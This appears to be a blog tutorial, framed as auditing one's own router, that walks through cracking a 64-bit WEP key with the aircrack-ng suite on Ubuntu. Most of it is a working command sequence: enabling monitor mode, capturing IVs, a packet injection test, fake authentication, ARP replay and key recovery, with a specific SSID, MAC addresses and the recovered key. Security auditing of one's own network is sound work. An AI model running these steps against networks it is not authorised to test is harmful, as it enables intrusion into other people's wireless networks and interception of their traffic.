Turn Off Your Wireless Access Point
That’s right, I am here trying to persuade everyone to turn off your wireless connection. In all reality I’m not really trying to tell you to turn off your wifi access, but will try to make you more aware of certain security vulnerabilities that wireless can offer.
In this article I am going walk you through on how a war driver could hack into your wireless router that is protected with a WEP 64 bit key. In this article I will be using a ubuntu linux ran pc, with a belkin 9050 usb wireless adapter. The program that I will using is called aircrack-ng. The first thing that you must do in order to check your security on your wireless router, is find a wireless adapter that can be put into monitor mode. To check to see if your wireless adapter is compatible.
After you have a compatible adapter and the driver is all setup, then you have to enable monitor mode. Just to note, your wireless adapter may take on a different name, then mine does. To find out what your wifi card is called, type in the command ifconfig. Throughout this article, I will be using a terminal program logged in under su.
The first thing that your are going to want to do when auditing your wireless security on your router is find out a little bit of information. In order for you to audit your wireless router, you will first have to turn on monitor mode / promiscuous mode.
airmon-ng start wlan0
Since you will be hacking into your own wireless router, you will see how this is done from a hackers point of view. The next command that you will issue, will allow you to view a list of local wireless networks in your network, what channel the network is on and the mac address of the router.
airodump-ng mon0
In order to test the security on your wireless network, you need to record the mac address of your router, what channel your router is on, SSID, and the mac address of your wireless adapter. In order to find the mac address of your wireless adapter; open a terminal window and issue the command ifconfig. You should see your mac address, listed as HWaddr. After your have recorded all the important information your need, you now need to shut down your wireless adapter.
airmon-ng stop mon0
airmon-ng stop wlan0
Start monitor mode on again and set channel to 1.
airmon-ng start wlan0 1
We will now test and see if we can inject packets into the router.
aireplay-ng -9 -e 2WIRE276 -a 00:18:3F:7A:B8:11 mon0
Start airodum-ng and capture Ivs
airodump-ng -c 1 --bssid 00:18:3F:7A:B8:11 -w output mon0
Authenticate with the router
aireplay-ng -1 0 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
OR
aireplay-ng -1 6000 -o 1 -q 10 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
Collecting arp requests used to create data.
aireplay-ng -3 -b 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0
Use Aircrack-ng to obtain wep key.
aircrack-ng -z -b 00:18:3F:7A:B8:11 output*.cap
airmon-ng stop mon0
airmon-ng stop wlan0
Login using key: 313865309
Related posts: